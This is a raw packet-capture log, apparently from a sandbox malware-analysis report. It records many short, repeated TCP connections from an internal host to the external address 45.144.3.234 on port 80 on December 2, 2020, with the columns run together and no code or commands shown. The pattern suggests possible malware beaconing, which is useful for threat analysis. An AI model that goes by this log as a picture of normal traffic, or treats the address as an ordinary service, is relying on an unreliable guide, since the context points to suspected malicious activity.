                                            Dec 2, 2020 11:52:53.324316025 CET4974080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:53.327474117 CET4974080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:53.382328987 CET804974045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:53.382477999 CET4974080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:53.435245991 CET804974045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:53.459325075 CET804974045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:53.459352016 CET804974045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:53.459502935 CET4974080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:53.459583044 CET4974080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:53.512610912 CET804974045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:53.722524881 CET4974180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:53.774750948 CET804974145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:53.774861097 CET4974180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:53.777770042 CET4974180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:53.830013037 CET804974145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:53.830080032 CET4974180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:53.882267952 CET804974145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:53.903446913 CET804974145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:53.903476954 CET804974145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:53.903548002 CET4974180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:53.903574944 CET4974180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:53.955826998 CET804974145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:53.955864906 CET804974145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:53.955992937 CET4974180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:54.147746086 CET4974280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:54.201075077 CET804974245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:54.201193094 CET4974280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:54.204572916 CET4974280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:54.261749983 CET804974245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:54.261811972 CET4974280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:54.317683935 CET804974245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:54.341794968 CET804974245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:54.341835022 CET804974245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:54.341881037 CET4974280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:54.341928959 CET4974280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:54.394645929 CET804974245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:54.604258060 CET4974380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:54.656949997 CET804974345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:54.657593966 CET4974380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:54.660317898 CET4974380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:54.711915016 CET804974345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:54.712184906 CET4974380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:54.763891935 CET804974345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:54.786220074 CET804974345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:54.786246061 CET804974345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:54.786365986 CET4974380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:54.786411047 CET4974380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:54.841531992 CET804974345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:55.052794933 CET4974480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:55.106204987 CET804974445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:55.111207962 CET4974480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:55.114402056 CET4974480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:55.168013096 CET804974445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:55.168152094 CET4974480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:55.220961094 CET804974445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:55.244730949 CET804974445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:55.244769096 CET804974445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:55.244977951 CET4974480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:55.245035887 CET4974480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:55.297307014 CET804974445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:55.443448067 CET4974580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:55.495680094 CET804974545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:55.495795012 CET4974580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:55.544487000 CET4974580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:55.596345901 CET804974545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:55.596440077 CET4974580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:55.649012089 CET804974545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:55.674252987 CET804974545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:55.674278021 CET804974545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:55.674365044 CET4974580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:55.674484015 CET4974580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:55.726207972 CET804974545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:55.923448086 CET4974680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:55.977107048 CET804974645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:55.977277994 CET4974680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:55.981451988 CET4974680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:56.053781033 CET804974645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:56.053913116 CET4974680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:56.106298923 CET804974645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:56.194096088 CET804974645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:56.194122076 CET804974645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:56.194252014 CET4974680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:56.194313049 CET4974680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:56.247328997 CET804974645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:56.432964087 CET4974780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:56.485492945 CET804974745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:56.485663891 CET4974780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:56.489115000 CET4974780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:56.541619062 CET804974745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:56.541968107 CET4974780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:56.594615936 CET804974745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:56.615647078 CET804974745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:56.615708113 CET804974745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:56.615780115 CET4974780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:56.617491961 CET4974780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:56.670824051 CET804974745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:56.799231052 CET4974880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:56.853033066 CET804974845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:56.853224993 CET4974880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:56.856209993 CET4974880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:56.909560919 CET804974845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:56.909864902 CET4974880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:56.962670088 CET804974845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:56.986978054 CET804974845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:56.987040043 CET804974845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:56.987138987 CET4974880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:56.987283945 CET4974880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:57.042236090 CET804974845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:57.212182999 CET4974980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:57.266036034 CET804974945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:57.266148090 CET4974980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:57.268927097 CET4974980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:57.322961092 CET804974945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:57.323098898 CET4974980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:57.377074003 CET804974945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:57.405086040 CET804974945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:57.405116081 CET804974945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:57.405287027 CET4974980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:57.405333042 CET4974980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:57.457844019 CET804974945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:57.686172009 CET4975080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:57.738847017 CET804975045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:57.741368055 CET4975080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:57.744998932 CET4975080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:57.804090977 CET804975045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:57.804277897 CET4975080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:57.856832027 CET804975045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:57.883454084 CET804975045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:57.883476973 CET804975045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:57.883683920 CET4975080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:57.936269999 CET804975045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:58.063837051 CET4975180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:58.116362095 CET804975145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:58.116498947 CET4975180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:58.120465994 CET4975180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:58.172971010 CET804975145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:58.173096895 CET4975180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:58.225471020 CET804975145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:58.247212887 CET804975145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:58.247235060 CET804975145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:58.247315884 CET4975180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:58.247356892 CET4975180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:58.304827929 CET804975145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:58.517242908 CET4975280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:58.570117950 CET804975245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:58.570257902 CET4975280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:58.573098898 CET4975280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:58.625576973 CET804975245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:58.625736952 CET4975280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:58.678409100 CET804975245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:58.705684900 CET804975245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:58.705705881 CET804975245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:58.705857992 CET4975280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:58.705878973 CET4975280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:58.759761095 CET804975245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:58.908612967 CET4975380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:58.960675955 CET804975345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:58.960812092 CET4975380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:58.978022099 CET4975380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:59.030369997 CET804975345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:59.030513048 CET4975380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:59.082428932 CET804975345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:59.104919910 CET804975345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:59.104958057 CET804975345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:59.105079889 CET4975380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:59.105148077 CET4975380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:59.157224894 CET804975345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:59.323198080 CET4975480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:59.375668049 CET804975445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:59.375760078 CET4975480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:59.378493071 CET4975480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:59.431092024 CET804975445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:59.431277037 CET4975480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:59.484323025 CET804975445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:59.505511999 CET804975445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:59.505542040 CET804975445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:59.505623102 CET4975480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:59.505700111 CET4975480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:59.558178902 CET804975445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:59.714940071 CET4975580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:59.767605066 CET804975545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:59.767709017 CET4975580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:59.770770073 CET4975580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:59.876328945 CET804975545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:59.876540899 CET4975580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:59.931091070 CET804975545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:59.952721119 CET804975545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:59.952764034 CET804975545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:59.952841043 CET4975580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:59.953461885 CET4975580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:00.006167889 CET804975545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:00.194998980 CET4975680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:00.248035908 CET804975645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:00.248212099 CET4975680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:00.250977039 CET4975680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:00.306262970 CET804975645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:00.306401014 CET4975680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:00.359276056 CET804975645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:00.382494926 CET804975645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:00.382527113 CET804975645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:00.382654905 CET4975680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:00.382707119 CET4975680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:00.435606003 CET804975645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:00.587783098 CET4975780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:00.639686108 CET804975745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:00.639832020 CET4975780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:00.644083023 CET4975780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:00.695887089 CET804975745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:00.696590900 CET4975780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:00.748495102 CET804975745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:00.769340038 CET804975745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:00.769371033 CET804975745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:00.769479036 CET4975780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:00.769604921 CET4975780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:00.823146105 CET804975745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:00.991533041 CET4975880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:01.044569969 CET804975845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:01.045030117 CET4975880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:01.090385914 CET4975880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:01.143105984 CET804975845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:01.143268108 CET4975880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:01.196012020 CET804975845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:01.218769073 CET804975845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:01.218799114 CET804975845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:01.218996048 CET4975880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:01.219027042 CET4975880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:01.273492098 CET804975845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:01.480278015 CET4975980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:01.532646894 CET804975945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:01.532932043 CET4975980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:01.537713051 CET4975980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:01.590030909 CET804975945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:01.590174913 CET4975980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:01.642452955 CET804975945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:01.667457104 CET804975945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:01.667542934 CET804975945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:01.667809010 CET4975980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:01.667855024 CET4975980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:01.722275019 CET804975945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:01.947396994 CET4976080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:01.999943972 CET804976045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:02.000056982 CET4976080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:02.003036022 CET4976080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:02.054584980 CET804976045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:02.055839062 CET4976080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:02.107743979 CET804976045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:02.131956100 CET804976045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:02.131987095 CET804976045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:02.132128954 CET4976080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:02.132163048 CET4976080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:02.183789015 CET804976045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:02.315164089 CET4976180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:02.366969109 CET804976145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:02.367100954 CET4976180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:02.371231079 CET4976180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:02.431696892 CET804976145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:02.431969881 CET4976180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:02.484010935 CET804976145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:02.505198956 CET804976145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:02.505227089 CET804976145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:02.505345106 CET4976180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:02.516562939 CET4976180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:02.571868896 CET804976145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:02.907706976 CET4976280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:02.959582090 CET804976245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:02.962471962 CET4976280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:02.962532043 CET4976280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:03.014370918 CET804976245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:03.015748024 CET4976280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:03.067565918 CET804976245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:03.089901924 CET804976245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:03.089934111 CET804976245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:03.091732025 CET4976280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:03.091778040 CET4976280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:03.143480062 CET804976245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:03.337080956 CET4976380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:03.389986038 CET804976345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:03.390108109 CET4976380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:03.392819881 CET4976380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:03.445588112 CET804976345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:03.445830107 CET4976380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:03.498693943 CET804976345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:03.522391081 CET804976345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:03.522438049 CET804976345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:03.522663116 CET4976380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:03.733978033 CET4976380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:03.786808014 CET804976345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:04.151349068 CET4976480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:04.204257011 CET804976445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:04.204355955 CET4976480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:04.207113028 CET4976480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:04.259829998 CET804976445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:04.260684013 CET4976480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:04.313492060 CET804976445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:04.333813906 CET804976445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:04.333842039 CET804976445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:04.333959103 CET4976480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:04.937446117 CET4976480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:04.990520000 CET804976445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:05.284806967 CET4976580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:05.336621046 CET804976545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:05.336719036 CET4976580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:05.339663982 CET4976580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:05.391290903 CET804976545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:05.391392946 CET4976580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:05.443084955 CET804976545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:05.464608908 CET804976545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:05.464689016 CET804976545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:05.464756966 CET4976580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:05.516489029 CET804976545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:05.683804989 CET4976680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:05.736955881 CET804976645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:05.737140894 CET4976680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:05.740205050 CET4976680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:05.793400049 CET804976645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:05.793560982 CET4976680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:05.846287966 CET804976645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:05.865657091 CET804976645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:05.865681887 CET804976645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:05.865798950 CET4976680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:05.865866899 CET4976680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:05.918875933 CET804976645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:06.051013947 CET4976780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:06.103274107 CET804976745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:06.103455067 CET4976780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:06.108568907 CET4976780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:06.161118984 CET804976745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:06.161303043 CET4976780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:06.213058949 CET804976745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:06.249782085 CET804976745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:06.249804020 CET804976745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:06.249907017 CET4976780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:06.250144005 CET4976780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:06.301949978 CET804976745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:06.497983932 CET4976880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:06.550235987 CET804976845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:06.550381899 CET4976880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:06.554063082 CET4976880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:06.606226921 CET804976845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:06.606434107 CET4976880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:06.658672094 CET804976845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:06.678922892 CET804976845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:06.678955078 CET804976845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:06.679061890 CET4976880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:06.679424047 CET4976880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:06.732508898 CET804976845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:06.928714037 CET4976980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:06.980772972 CET804976945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:06.980895042 CET4976980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:06.984148026 CET4976980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:07.035906076 CET804976945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:07.035990000 CET4976980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:07.087723970 CET804976945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:07.107873917 CET804976945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:07.107897997 CET804976945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:07.108000994 CET4976980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:07.108105898 CET4976980192.168.2.645.144.3.234
